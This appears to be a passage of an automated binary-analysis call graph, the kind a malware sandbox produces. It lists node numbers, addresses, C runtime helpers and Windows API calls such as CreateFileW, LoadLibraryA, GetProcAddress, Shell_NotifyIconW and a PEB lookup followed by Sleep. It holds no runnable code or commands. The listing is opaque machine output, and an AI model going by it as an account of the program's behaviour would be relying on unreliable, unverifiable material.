94419->94420 94420->94400 94422 4a5e7b 
94421->94422 94423 4a5ea6 94422->94423 94424 4a5e85 94422->94424 94425 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94423->94425 94426 497bda __dosmaperr 47 API calls 94424->94426 94434 4a5ec8 94425->94434 94427 4a5e8a 94426->94427 94429 497c0e __wtof_l 47 API calls 94427->94429 94428 4a5f46 GetFileType 94432 4a5f93 94428->94432 94433 4a5f51 GetLastError 94428->94433 94431 4a5e94 94429->94431 94430 4a5f14 GetLastError 94435 497bed __dosmaperr 47 API calls 94430->94435 94436 497c0e __wtof_l 47 API calls 94431->94436 94443 49ac0b __set_osfhnd 48 API calls 94432->94443 94437 497bed __dosmaperr 47 API calls 94433->94437 94434->94428 94434->94430 94439 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94434->94439 94440 4a5f39 94435->94440 94436->94414 94438 4a5f78 CloseHandle 94437->94438 94438->94440 94441 4a5f86 94438->94441 94442 4a5f09 94439->94442 94445 497c0e __wtof_l 47 API calls 94440->94445 94444 497c0e __wtof_l 47 API calls 94441->94444 94442->94428 94442->94430 94448 4a5fb1 94443->94448 94446 4a5f8b 94444->94446 94445->94420 94446->94440 94447 4a616c 94447->94420 94450 4a633f CloseHandle 94447->94450 94448->94447 94449 49f82f __lseeki64_nolock 49 API calls 94448->94449 94465 4a6032 94448->94465 94451 4a601b 94449->94451 94452 4a5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94450->94452 94453 497bda __dosmaperr 47 API calls 94451->94453 94469 4a603a 94451->94469 94455 4a6366 94452->94455 94453->94465 94454 49ee0e 59 API calls __filbuf 94454->94469 94456 4a636e GetLastError 94455->94456 94457 4a61f6 94455->94457 94458 497bed __dosmaperr 47 API calls 94456->94458 94457->94420 94459 4a637a 94458->94459 94461 49ab1e __free_osfhnd 48 API calls 94459->94461 94460 49ea9c __close_nolock 50 API calls 94460->94469 94461->94457 94462 4a6f40 __chsize_nolock 81 API calls 94462->94469 94463 49f82f 49 API calls __lseeki64_nolock 94463->94465 94464 49af61 __flush 78 API calls 94464->94465 94465->94447 94465->94463 
94465->94464 94465->94469 94466 4a61e9 94468 49ea9c __close_nolock 50 API calls 94466->94468 94467 4a61d2 94467->94447 94471 4a61f0 94468->94471 94469->94454 94469->94460 94469->94462 94469->94465 94469->94466 94469->94467 94470 49f82f 49 API calls __lseeki64_nolock 94469->94470 94470->94469 94472 497c0e __wtof_l 47 API calls 94471->94472 94472->94457 94473->94391 94474->94396 94475->94396 94480 4742f6 94476->94480 94479 4742cc LoadLibraryA GetProcAddress 94479->94274 94481 4742aa 94480->94481 94482 4742ff LoadLibraryA 94480->94482 94481->94274 94481->94479 94482->94481 94483 474310 GetProcAddress 94482->94483 94483->94481 94485 48f4ea 48 API calls 94484->94485 94486 4747c9 94485->94486 94486->94282 94488 474085 FindResourceExW 94487->94488 94492 4740a2 94487->94492 94489 4e4f16 LoadResource 94488->94489 94488->94492 94490 4e4f2b SizeofResource 94489->94490 94489->94492 94491 4e4f3f LockResource 94490->94491 94490->94492 94491->94492 94492->94283 94494 474526 94493->94494 94495 4e4fe0 94493->94495 94499 493a8d 94494->94499 94497 474534 94497->94294 94498->94283 94500 493a99 _doexit 94499->94500 94501 493aa7 94500->94501 94503 493acd 94500->94503 94512 497c0e 47 API calls __getptd_noexit 94501->94512 94505 494e1c __lock_file 48 API calls 94503->94505 94504 493aac 94513 496e10 8 API calls __wtof_l 94504->94513 94507 493ad3 94505->94507 94514 4939fe 81 API calls 5 library calls 94507->94514 94509 493ae2 94515 493b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94509->94515 94511 493ab7 _doexit 94511->94497 94512->94504 94513->94511 94514->94509 94515->94511 94519 493839 94516->94519 94518 474510 94518->94302 94520 493845 _doexit 94519->94520 94521 493880 _doexit 94520->94521 94522 493888 94520->94522 94523 49385b _memset 94520->94523 94521->94518 94524 494e1c __lock_file 48 API calls 94522->94524 94532 497c0e 47 API calls __getptd_noexit 94523->94532 94525 49388e 94524->94525 94534 49365b 62 API calls 5 library calls 94525->94534 94528 493875 94533 496e10 8 API 
calls __wtof_l 94528->94533 94530 4938a4 94535 4938c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94530->94535 94532->94528 94533->94521 94534->94530 94535->94521 94539 49344a GetSystemTimeAsFileTime 94536->94539 94538 4bbdc3 94538->94304 94540 493478 __aulldiv 94539->94540 94540->94538 94542 493e71 _doexit 94541->94542 94543 493e7f 94542->94543 94544 493e94 94542->94544 94555 497c0e 47 API calls __getptd_noexit 94543->94555 94546 494e1c __lock_file 48 API calls 94544->94546 94548 493e9a 94546->94548 94547 493e84 94556 496e10 8 API calls __wtof_l 94547->94556 94557 493b0c 55 API calls 5 library calls 94548->94557 94551 493ea5 94558 493ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94551->94558 94553 493eb7 94554 493e8f _doexit 94553->94554 94554->94309 94555->94547 94556->94554 94557->94551 94558->94553 94560 491e61 94559->94560 94563 491e55 94559->94563 94583 497c0e 47 API calls __getptd_noexit 94560->94583 94562 492019 94567 491e41 94562->94567 94584 496e10 8 API calls __wtof_l 94562->94584 94563->94560 94571 491ed4 94563->94571 94578 499d6b 47 API calls __wtof_l 94563->94578 94566 491fa0 94566->94560 94566->94567 94569 491fb0 94566->94569 94567->93845 94568 491f5f 94568->94560 94570 491f7b 94568->94570 94580 499d6b 47 API calls __wtof_l 94568->94580 94582 499d6b 47 API calls __wtof_l 94569->94582 94570->94560 94570->94567 94573 491f91 94570->94573 94571->94560 94577 491f41 94571->94577 94579 499d6b 47 API calls __wtof_l 94571->94579 94581 499d6b 47 API calls __wtof_l 94573->94581 94577->94566 94577->94568 94578->94571 94579->94577 94580->94570 94581->94567 94582->94567 94583->94562 94584->94567 94585->94240 94587 492aba _doexit 94586->94587 94588 492aec 94587->94588 94589 492ad4 94587->94589 94590 492ae4 _doexit 94587->94590 94591 494e1c __lock_file 48 API calls 94588->94591 94651 497c0e 47 API calls __getptd_noexit 94589->94651 94590->94251 94593 492af2 94591->94593 94639 492957 94593->94639 94594 492ad9 94652 496e10 8 API calls __wtof_l 
94594->94652 94607 4bc581 __tzset_nolock _wcscmp 94602->94607 94603 4744ed 64 API calls 94603->94607 94604 4bc05f 94604->94218 94604->94220 94605 4bbf5a GetSystemTimeAsFileTime 94605->94607 94606 474517 83 API calls 94606->94607 94607->94603 94607->94604 94607->94605 94607->94606 94651->94594 94652->94590 94669 47bd3f 94668->94669 94672 47bd5a 94668->94672 94670 47bdfa 48 API calls 94669->94670 94671 47bd47 CharUpperBuffW 94670->94671 94671->94672 94672->93737 94674 4e436a 94673->94674 94675 472b8b 94673->94675 94676 48f4ea 48 API calls 94675->94676 94677 472b92 94676->94677 94678 472bb3 94677->94678 94769 472bce 48 API calls 94677->94769 94678->93752 94681 47e8f6 94680->94681 94703 47e906 Mailbox 94680->94703 94683 47ed52 94681->94683 94681->94703 94682 4bcc5c 86 API calls 94682->94703 94851 48e3cd 335 API calls 94683->94851 94685 47ebc7 94686 47ebdd 94685->94686 94852 472ff6 16 API calls 94685->94852 94686->93795 94688 47ed63 94688->94686 94689 47ed70 94688->94689 94853 48e312 335 API calls Mailbox 94689->94853 94690 47e94c PeekMessageW 94690->94703 94691 4e526e Sleep 94691->94703 94693 47ed77 LockWindowUpdate DestroyWindow GetMessageW 94693->94686 94695 47eda9 94693->94695 94697 4e59ef TranslateMessage DispatchMessageW GetMessageW 94695->94697 94697->94697 94700 4e5a1f 94697->94700 94698 471caa 49 API calls 94698->94703 94699 48f4ea 48 API calls 94699->94703 94700->94686 94701 47ebf7 timeGetTime 94701->94703 94702 47ed21 PeekMessageW 94702->94703 94703->94682 94703->94685 94703->94690 94703->94691 94703->94698 94703->94699 94703->94701 94703->94702 94705 476eed 48 API calls 94703->94705 94706 4e5557 WaitForSingleObject 94703->94706 94707 4e588f Sleep 94703->94707 94709 47ed3a TranslateMessage DispatchMessageW 94703->94709 94711 47edae timeGetTime 94703->94711 94713 4e5733 Sleep 94703->94713 94719 4e5445 Sleep 94703->94719 94731 47fe30 311 API calls 94703->94731 94734 4845e0 311 API calls 94703->94734 94735 483200 311 API calls 94703->94735 94736 4e5429 Mailbox 
94703->94736 94738 47ce19 48 API calls 94703->94738 94739 47d6e9 55 API calls 94703->94739 94740 472aae 311 API calls 94703->94740 94770 47ef00 94703->94770 94775 47f110 94703->94775 94840 48e244 94703->94840 94845 48dc5f 94703->94845 94850 47eed0 335 API calls Mailbox 94703->94850 94855 4d8d23 48 API calls 94703->94855 94705->94703 94706->94703 94708 4e5574 GetExitCodeProcess CloseHandle 94706->94708 94707->94736 94708->94703 94709->94702 94710 47d7f7 48 API calls 94710->94736 94854 471caa 49 API calls 94711->94854 94713->94736 94716 48dc38 timeGetTime 94716->94736 94717 4e5926 GetExitCodeProcess 94720 4e593c WaitForSingleObject 94717->94720 94721 4e5952 CloseHandle 94717->94721 94719->94703 94720->94703 94720->94721 94721->94736 94722 4e5432 Sleep 94722->94719 94723 4d8c4b 108 API calls 94723->94736 94724 472c79 107 API calls 94724->94736 94726 4e59ae Sleep 94726->94703 94729 47ce19 48 API calls 94729->94736 94731->94703 94732 47d6e9 55 API calls 94732->94736 94734->94703 94735->94703 94736->94703 94736->94710 94736->94716 94736->94717 94736->94719 94736->94722 94736->94723 94736->94724 94736->94726 94736->94729 94736->94732 94856 4b4cbe 49 API calls Mailbox 94736->94856 94857 471caa 49 API calls 94736->94857 94858 472aae 335 API calls 94736->94858 94859 4cccb2 50 API calls 94736->94859 94860 4b7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94736->94860 94861 4b6532 63 API calls 3 library calls 94736->94861 94738->94703 94739->94703 94740->94703 94741->93747 94742->93798 94743->93795 94744->93795 94745->93795 94746->93741 94747->93747 94748->93798 94749->93787 94750->93787 94751->93792 94752->93798 94753->93770 94754->93798 94755->93798 94756->93798 94757->93795 94758->93795 94759->93795 94760->93795 94762 47d6f4 94761->94762 94763 47d71b 94762->94763 94884 47d764 55 API calls 94762->94884 94763->93769 94765->93798 94766->93790 94767->93744 94768->93798 94769->94678 94771 47ef2f 94770->94771 94772 47ef1d 94770->94772 
94862 4bcc5c 86 API calls 4 library calls 94771->94862 94772->94703 94774 4e86f9 94774->94774 94776 47f130 94775->94776 94779 47fe30 335 API calls 94776->94779 94783 47f199 94776->94783 94777 47f3dd 94780 4e87c8 94777->94780 94791 47f3f2 94777->94791 94825 47f431 Mailbox 94777->94825 94778 47f595 94786 47d7f7 48 API calls 94778->94786 94778->94825 94781 4e8728 94779->94781 94867 4bcc5c 86 API calls 4 library calls 94780->94867 94781->94783 94864 4bcc5c 86 API calls 4 library calls 94781->94864 94783->94777 94783->94778 94787 47d7f7 48 API calls 94783->94787 94819 47f229 94783->94819 94784 47fe30 335 API calls 94784->94825 94788 4e87a3 94786->94788 94789 4e8772 94787->94789 94866 490f0a 52 API calls __cinit 94788->94866 94865 490f0a 52 API calls __cinit 94789->94865 94818 47f418 94791->94818 94868 4b9af1 48 API calls 94791->94868 94792 4e8b1b 94807 4e8bcf 94792->94807 94808 4e8b2c 94792->94808 94794 47d6e9 55 API calls 94794->94825 94796 47f770 94798 4e8a45 94796->94798 94817 47f77a 94796->94817 94797 4e8c53 94882 4bcc5c 86 API calls 4 library calls 94797->94882 94874 48c1af 48 API calls 94798->94874 94799 4e8810 94869 4ceef8 335 API calls 94799->94869 94800 47fe30 335 API calls 94820 47f6aa 94800->94820 94801 4bcc5c 86 API calls 94801->94825 94802 4e8b7e 94877 4ce40a 335 API calls Mailbox 94802->94877 94879 4bcc5c 86 API calls 4 library calls 94807->94879 94876 4cf5ee 335 API calls 94808->94876 94809 4e8beb 94880 4cbdbd 335 API calls Mailbox 94809->94880 94811 481b90 48 API calls 94811->94825 94814 481b90 48 API calls 94814->94825 94816 4e8c00 94839 47f537 Mailbox 94816->94839 94881 4bcc5c 86 API calls 4 library calls 94816->94881 94817->94814 94818->94792 94818->94820 94818->94825 94819->94777 94819->94778 94819->94818 94819->94825 94820->94796 94820->94800 94823 47fce0 94820->94823 94820->94825 94820->94839 94822 4e8823 94822->94818 94824 4e884b 94822->94824 94823->94839 94878 4bcc5c 86 API calls 4 library calls 94823->94878 94870 4cccdc 48 API calls 94824->94870 
94825->94784 94825->94794 94825->94797 94825->94801 94825->94802 94825->94809 94825->94811 94825->94823 94825->94839 94863 47dd47 48 API calls _memcpy_s 94825->94863 94875 4a97ed InterlockedDecrement 94825->94875 94883 48c1af 48 API calls 94825->94883 94829 4e8857 94831 4e8865 94829->94831 94832 4e88aa 94829->94832 94871 4b9b72 48 API calls 94831->94871 94835 4e88a0 Mailbox 94832->94835 94872 4ba69d 48 API calls 94832->94872 94833 47fe30 335 API calls 94833->94839 94835->94833 94837 4e88e7 94873 47bc74 48 API calls 94837->94873 94839->94703 94842 4edf42 94840->94842 94844 48e253 94840->94844 94841 4edf77 94842->94841 94843 4edf59 TranslateAcceleratorW 94842->94843 94843->94844 94844->94703 94846 48dc71 94845->94846 94847 48dca3 94845->94847 94846->94847 94848 48dc96 IsDialogMessageW 94846->94848 94849 4edd1d GetClassLongW 94846->94849 94847->94703 94848->94846 94848->94847 94849->94846 94849->94848 94850->94703 94851->94685 94852->94688 94853->94693 94854->94703 94855->94703 94856->94736 94857->94736 94858->94736 94859->94736 94860->94736 94861->94736 94862->94774 94863->94825 94864->94783 94865->94819 94866->94825 94867->94839 94868->94799 94869->94822 94870->94829 94871->94835 94872->94837 94873->94835 94874->94825 94875->94825 94876->94825 94877->94823 94878->94839 94879->94839 94880->94816 94881->94839 94882->94839 94883->94825 94884->94763 94885->93360 94886 473742 94887 47374b 94886->94887 94888 473769 94887->94888 94889 4737c8 94887->94889 94890 4737c6 94887->94890 94894 473776 94888->94894 94895 47382c PostQuitMessage 94888->94895 94892 4737ce 94889->94892 94893 4e1e00 94889->94893 94891 4737ab DefWindowProcW 94890->94891 94901 4737b9 94891->94901 94896 4737f6 SetTimer RegisterWindowMessageW 94892->94896 94897 4737d3 94892->94897 94941 472ff6 16 API calls 94893->94941 94899 4e1e88 94894->94899 94900 473781 94894->94900 94895->94901 94896->94901 94905 47381f CreatePopupMenu 94896->94905 94902 4e1da3 94897->94902 94903 4737da KillTimer 94897->94903 94956 
4b4ddd 60 API calls _memset 94899->94956 94906 473836 94900->94906 94907 473789 94900->94907 94915 4e1ddc MoveWindow 94902->94915 94916 4e1da8 94902->94916 94938 473847 Shell_NotifyIconW _memset 94903->94938 94904 4e1e27 94942 48e312 335 API calls Mailbox 94904->94942 94905->94901 94931 48eb83 94906->94931 94911 4e1e6d 94907->94911 94912 473794 94907->94912 94911->94891 94955 4aa5f3 48 API calls 94911->94955 94920 47379f 94912->94920 94921 4e1e58 94912->94921 94913 4e1e9a 94913->94891 94913->94901 94915->94901 94917 4e1dac 94916->94917 94918 4e1dcb SetFocus 94916->94918 94917->94920 94922 4e1db5 94917->94922 94918->94901 94919 4737ed 94939 47390f DeleteObject DestroyWindow Mailbox 94919->94939 94920->94891 94943 473847 Shell_NotifyIconW _memset 94920->94943 94954 4b55bd 70 API calls _memset 94921->94954 94940 472ff6 16 API calls 94922->94940 94927 4e1e68 94927->94901 94929 4e1e4c 94944 474ffc 94929->94944 94932 48eb9a _memset 94931->94932 94933 48ec1c 94931->94933 94957 4751af 94932->94957 94933->94901 94935 48ec05 KillTimer SetTimer 94935->94933 94936 48ebc1 94936->94935 94937 4e3c7a Shell_NotifyIconW 94936->94937 94937->94935 94938->94919 94939->94901 94940->94901 94941->94904 94942->94920 94943->94929 94945 475027 _memset 94944->94945 94991 474c30 94945->94991 94948 4750ac 94950 4e3d28 Shell_NotifyIconW 94948->94950 94951 4750ca Shell_NotifyIconW 94948->94951 94952 4751af 50 API calls 94951->94952 94953 4750df 94952->94953 94953->94890 94954->94927 94955->94890 94956->94913 94958 4752a2 Mailbox 94957->94958 94959 4751cb 94957->94959 94958->94936 94960 476b0f 48 API calls 94959->94960 94961 4751d9 94960->94961 94962 4751e6 94961->94962 94963 4e3ca1 LoadStringW 94961->94963 94979 476a63 94962->94979 94966 4e3cbb 94963->94966 94965 4751fb 94965->94966 94967 47520c 94965->94967 94968 47510d 48 API calls 94966->94968 94969 4752a7 94967->94969 94970 475216 94967->94970 94973 4e3cc5 94968->94973 94972 476eed 48 API calls 94969->94972 94971 47510d 48 API calls 
94970->94971 94976 475220 _memset _wcscpy 94971->94976 94972->94976 94974 47518c 48 API calls 94973->94974 94973->94976 94975 4e3ce7 94974->94975 94978 47518c 48 API calls 94975->94978 94977 475288 Shell_NotifyIconW 94976->94977 94977->94958 94978->94976 94980 476adf 94979->94980 94982 476a6f __NMSG_WRITE 94979->94982 94981 47b18b 48 API calls 94980->94981 94987 476ab6 _memcpy_s 94981->94987 94983 476ad7 94982->94983 94984 476a8b 94982->94984 94990 47c369 48 API calls 94983->94990 94986 476b4a 48 API calls 94984->94986 94988 476a95 94986->94988 94987->94965 94989 48ee75 48 API calls 94988->94989 94989->94987 94990->94987 94992 474c44 94991->94992 94993 4e3c33 94991->94993 94992->94948 94995 4b5819 61 API calls _W_store_winword 94992->94995 94993->94992 94994 4e3c3c DestroyIcon 94993->94994 94994->94992 94995->94948 94996 4e19cb 95001 472322 94996->95001 94998 4e19d1 95034 490f0a 52 API calls __cinit 94998->95034 95000 4e19db 95002 472344 95001->95002 95035 4726df 95002->95035 95007 47d7f7 48 API calls 95008 472384 95007->95008 95009 47d7f7 48 API calls 95008->95009 95010 47238e 95009->95010 95011 47d7f7 48 API calls 95010->95011 95012 472398 95011->95012 95013 47d7f7 48 API calls 95012->95013 95014 4723de 95013->95014 95015 47d7f7 48 API calls 95014->95015 95016 4724c1 95015->95016 95043 47263f 95016->95043 95020 4724f1 95021 47d7f7 48 API calls 95020->95021 95022 4724fb 95021->95022 95072 472745 95022->95072 95024 472546 95025 472556 GetStdHandle 95024->95025 95026 4e501d 95025->95026 95027 4725b1 95025->95027 95026->95027 95029 4e5026 95026->95029 95028 4725b7 CoInitialize 95027->95028 95028->94998 95079 4b92d4 53 API calls 95029->95079 95031 4e502d 95080 4b99f9 CreateThread 95031->95080 95033 4e5039 CloseHandle 95033->95028 95034->95000 95081 472854 95035->95081 95038 476a63 48 API calls 95039 47234a 95038->95039 95040 47272e 95039->95040 95095 4727ec 6 API calls 95040->95095 95042 47237a 95042->95007 95044 47d7f7 48 API calls 95043->95044 95045 47264f 
95044->95045 95046 47d7f7 48 API calls 95045->95046 95047 472657 95046->95047 95096 4726a7 95047->95096 95050 4726a7 48 API calls 95051 472667 95050->95051 95052 47d7f7 48 API calls 95051->95052 95053 472672 95052->95053 95054 48f4ea 48 API calls 95053->95054 95055 4724cb 95054->95055 95056 4722a4 95055->95056 95057 4722b2 95056->95057 95058 47d7f7 48 API calls 95057->95058 95059 4722bd 95058->95059 95060 47d7f7 48 API calls 95059->95060 95061 4722c8 95060->95061 95062 47d7f7 48 API calls 95061->95062 95063 4722d3 95062->95063 95064 47d7f7 48 API calls 95063->95064 95065 4722de 95064->95065 95066 4726a7 48 API calls 95065->95066 95067 4722e9 95066->95067 95068 48f4ea 48 API calls 95067->95068 95069 4722f0 95068->95069 95070 4e1fe7 95069->95070 95071 4722f9 RegisterWindowMessageW 95069->95071 95071->95020 95073 472755 95072->95073 95074 4e5f4d 95072->95074 95076 48f4ea 48 API calls 95073->95076 95101 4bc942 50 API calls 95074->95101 95078 47275d 95076->95078 95077 4e5f58 95078->95024 95079->95031 95080->95033 95102 4b99df 54 API calls 95080->95102 95088 472870 95081->95088 95084 472870 48 API calls 95085 472864 95084->95085 95086 47d7f7 48 API calls 95085->95086 95087 472716 95086->95087 95087->95038 95089 47d7f7 48 API calls 95088->95089 95090 47287b 95089->95090 95091 47d7f7 48 API calls 95090->95091 95092 472883 95091->95092 95093 47d7f7 48 API calls 95092->95093 95094 47285c 95093->95094 95094->95084 95095->95042 95097 47d7f7 48 API calls 95096->95097 95098 4726b0 95097->95098 95099 47d7f7 48 API calls 95098->95099 95100 47265f 95099->95100 95100->95050 95101->95077 95103 47ef80 95106 483b70 95103->95106 95105 47ef8c 95107 483bc8 95106->95107 95119 4842a5 95106->95119 95108 483bef 95107->95108 95109 4e6fd1 95107->95109 95112 4e6f7e 95107->95112 95120 4e6f9b 95107->95120 95110 48f4ea 48 API calls 95108->95110 95186 4cceca 335 API calls Mailbox 95109->95186 95111 483c18 95110->95111 95114 48f4ea 48 API calls 95111->95114 95112->95108 95115 4e6f87 95112->95115 
95142 483c2c _memcpy_s __NMSG_WRITE 95114->95142 95183 4cd552 335 API calls Mailbox 95115->95183 95116 4e6fbe 95185 4bcc5c 86 API calls 4 library calls 95116->95185 95198 4bcc5c 86 API calls 4 library calls 95119->95198 95120->95116 95184 4cda0e 335 API calls 2 library calls 95120->95184 95121 4842f2 95205 4bcc5c 86 API calls 4 library calls 95121->95205 95124 483f2b 95124->95105 95125 4e73b0 95125->95105 95126 4e737a 95204 4bcc5c 86 API calls 4 library calls 95126->95204 95127 4e7297 95194 4bcc5c 86 API calls 4 library calls 95127->95194 95132 4e707e 95187 4bcc5c 86 API calls 4 library calls 95132->95187 95134 4840df 95195 4bcc5c 86 API calls 4 library calls 95134->95195 95135 47d6e9 55 API calls 95135->95142 95137 48dce0 53 API calls 95137->95142 95139 47d645 53 API calls 95139->95142 95142->95119 95142->95121 95142->95124 95142->95126 95142->95127 95142->95132 95142->95134 95142->95135 95142->95137 95142->95139 95143 4e72d2 95142->95143 95144 47fe30 335 API calls 95142->95144 95146 4e7350 95142->95146 95148 4e7363 95142->95148 95150 4e72e9 95142->95150 95153 476a63 48 API calls 95142->95153 95155 4e714c 95142->95155 95156 47d286 48 API calls 95142->95156 95157 48f4ea 48 API calls 95142->95157 95158 48c050 48 API calls 95142->95158 95160 4e733f 95142->95160 95164 476eed 48 API calls 95142->95164 95167 48ee75 48 API calls 95142->95167 95169 4e71e1 95142->95169 95178 47d9a0 53 API calls __cinit 95142->95178 95179 47d83d 53 API calls 95142->95179 95180 47cdb9 48 API calls 95142->95180 95181 48c15c 48 API calls 95142->95181 95182 48becb 335 API calls 95142->95182 95188 47dcae 50 API calls Mailbox 95142->95188 95189 4cccdc 48 API calls 95142->95189 95190 4ba1eb 50 API calls 95142->95190 95196 4bcc5c 86 API calls 4 library calls 95143->95196 95144->95142 95202 4bcc5c 86 API calls 4 library calls 95146->95202 95203 4bcc5c 86 API calls 4 library calls 95148->95203 95197 4bcc5c 86 API calls 4 library calls 95150->95197 95153->95142 95191 4cccdc 48 API calls 95155->95191 
95156->95142 95157->95142 95158->95142 95201 4bcc5c 86 API calls 4 library calls 95160->95201 95163 4e71a1 95193 48c15c 48 API calls 95163->95193 95164->95142 95167->95142 95169->95124 95200 4bcc5c 86 API calls 4 library calls 95169->95200 95171 4e715f 95171->95163 95192 4cccdc 48 API calls 95171->95192 95172 4e71ce 95173 48c050 48 API calls 95172->95173 95175 4e71d6 95173->95175 95174 4e71ab 95174->95119 95174->95172 95175->95169 95176 4e7313 95175->95176 95199 4bcc5c 86 API calls 4 library calls 95176->95199 95178->95142 95179->95142 95180->95142 95181->95142 95182->95142 95183->95124 95184->95116 95185->95109 95186->95142 95187->95124 95188->95142 95189->95142 95190->95142 95191->95171 95192->95171 95193->95174 95194->95134 95195->95124 95196->95150 95197->95124 95198->95124 95199->95124 95200->95124 95201->95124 95202->95124 95203->95124 95204->95124 95205->95125 95206 4e9c06 95217 48d3be 95206->95217 95208 4e9c1c 95216 4e9c91 Mailbox 95208->95216 95226 471caa 49 API calls 95208->95226 95210 483200 335 API calls 95211 4e9cc5 95210->95211 95214 4ea7ab Mailbox 95211->95214 95228 4bcc5c 86 API calls 4 library calls 95211->95228 95213 4e9c71 95213->95211 95227 4bb171 48 API calls 95213->95227 95216->95210 95218 48d3ca 95217->95218 95219 48d3dc 95217->95219 95229 47dcae 50 API calls Mailbox 95218->95229 95221 48d40b 95219->95221 95222 48d3e2 95219->95222 95230 47dcae 50 API calls Mailbox 95221->95230 95223 48f4ea 48 API calls 95222->95223 95225 48d3d4 95223->95225 95225->95208 95226->95213 95227->95216 95228->95214 95229->95225 95230->95225 95231 13420f8 95245 133fd28 95231->95245 95233 13421d4 95248 1341fe8 95233->95248 95251 1343218 GetPEB 95245->95251 95247 13403b3 95247->95233 95249 1341ff1 Sleep 95248->95249 95250 1341fff 95249->95250 95252 1343242 95251->95252 95252->95247 95253 4e19dd 95258 474a30 95253->95258 95255 4e19f1 95278 490f0a 52 API calls __cinit 95255->95278 95257 4e19fb 95259 474a40 __ftell_nolock 95258->95259 95260 47d7f7 48 API calls 
95259->95260 95261 474af6 95260->95261 95279 475374 95261->95279 95263 474aff 95286 47363c 95263->95286 95266 47518c 48 API calls 95267 474b18 95266->95267 95292 4764cf 95267->95292 95270 47d7f7 48 API calls 95271 474b32 95270->95271 95298 4749fb 95271->95298 95273 4761a6 48 API calls 95277 474b3d _wcscat Mailbox __NMSG_WRITE 95273->95277 95274 474b43 Mailbox 95274->95255 95275 47ce19 48 API calls 95275->95277 95276 4764cf 48 API calls 95276->95277 95277->95273 95277->95274 95277->95275 95277->95276 95278->95257 95312 49f8a0 95279->95312 95282 47ce19 48 API calls 95283 4753a7 95282->95283 95314 47660f 95283->95314 95285 4753b1 Mailbox 95285->95263 95287 473649 __ftell_nolock 95286->95287 95325 47366c GetFullPathNameW 95287->95325 95289 47365a 95290 476a63 48 API calls 95289->95290 95291 473669 95290->95291 95291->95266 95293 47651b 95292->95293 95297 4764dd _memcpy_s 95292->95297 95295 48f4ea 48 API calls 95293->95295 95294 48f4ea 48 API calls 95296 474b29 95294->95296 95295->95297 95296->95270 95297->95294 95327 47bcce 95298->95327 95301 4e41cc RegQueryValueExW 95303 4e4246 RegCloseKey 95301->95303 95304 4e41e5 95301->95304 95302 474a2b 95302->95277 95305 48f4ea 48 API calls 95304->95305 95306 4e41fe 95305->95306 95307 4747b7 48 API calls 95306->95307 95308 4e4208 RegQueryValueExW 95307->95308 95309 4e4224 95308->95309 95310 4e423b 95308->95310 95311 476a63 48 API calls 95309->95311 95310->95303 95311->95310 95313 475381 GetModuleFileNameW 95312->95313 95313->95282 95315 49f8a0 __ftell_nolock 95314->95315 95316 47661c GetFullPathNameW 95315->95316 95317 476a63 48 API calls 95316->95317 95318 476643 95317->95318 95321 476571 95318->95321 95322 47657f 95321->95322 95323 47b18b 48 API calls 95322->95323 95324 47658f 95323->95324 95324->95285 95326 47368a 95325->95326 95326->95289 95328 47bce8 95327->95328 95332 474a0a RegOpenKeyExW 95327->95332 95329 48f4ea 48 API calls 95328->95329 95330 47bcf2 95329->95330 95331 48ee75 48 API calls 95330->95331 95331->95332 
95332->95301 95332->95302 95333 495dfd 95334 495e09 _doexit 95333->95334 95370 497eeb GetStartupInfoW 95334->95370 95336 495e0e 95372 499ca7 GetProcessHeap 95336->95372 95338 495e66 95339 495e71 95338->95339 95457 495f4d 47 API calls 3 library calls 95338->95457 95373 497b47 95339->95373 95342 495e77 95343 495e82 __RTC_Initialize 95342->95343 95458 495f4d 47 API calls 3 library calls 95342->95458 95394 49acb3 95343->95394 95346 495e91 95347 495e9d GetCommandLineW 95346->95347 95459 495f4d 47 API calls 3 library calls 95346->95459 95413 4a2e7d GetEnvironmentStringsW 95347->95413 95350 495e9c 95350->95347 95354 495ec2 95426 4a2cb4 95354->95426 95357 495ec8 95358 495ed3 95357->95358 95461 49115b 47 API calls 3 library calls 95357->95461 95440 491195 95358->95440 95361 495edb 95362 495ee6 __wwincmdln 95361->95362 95462 49115b 47 API calls 3 library calls 95361->95462 95444 473a0f 95362->95444 95371 497f01 95370->95371 95371->95336 95372->95338 95465 49123a 30 API calls 2 library calls 95373->95465 95375 497b4c 95466 497e23 InitializeCriticalSectionAndSpinCount 95375->95466 95377 497b51 95378 497b55 95377->95378 95468 497e6d TlsAlloc 95377->95468 95467 497bbd 50 API calls 2 library calls 95378->95467 95381 497b5a 95381->95342 95382 497b67 95382->95378 95383 497b72 95382->95383 95469 496986 95383->95469 95386 497bb4 95477 497bbd 50 API calls 2 library calls 95386->95477 95389 497bb9 95389->95342 95390 497b93 95390->95386 95391 497b99 95390->95391 95476 497a94 47 API calls 4 library calls 95391->95476 95393 497ba1 GetCurrentThreadId 95393->95342 95395 49acbf _doexit 95394->95395 95396 497cf4 __lock 47 API calls 95395->95396 95397 49acc6 95396->95397 95398 496986 __calloc_crt 47 API calls 95397->95398 95399 49acd7 95398->95399 95400 49ad42 GetStartupInfoW 95399->95400 95401 49ace2 _doexit @_EH4_CallFilterFunc@8 95399->95401 95407 49ae80 95400->95407 95410 49ad57 95400->95410 95401->95346 95402 49af44 95486 49af58 LeaveCriticalSection _doexit 95402->95486 95404 49aec9 
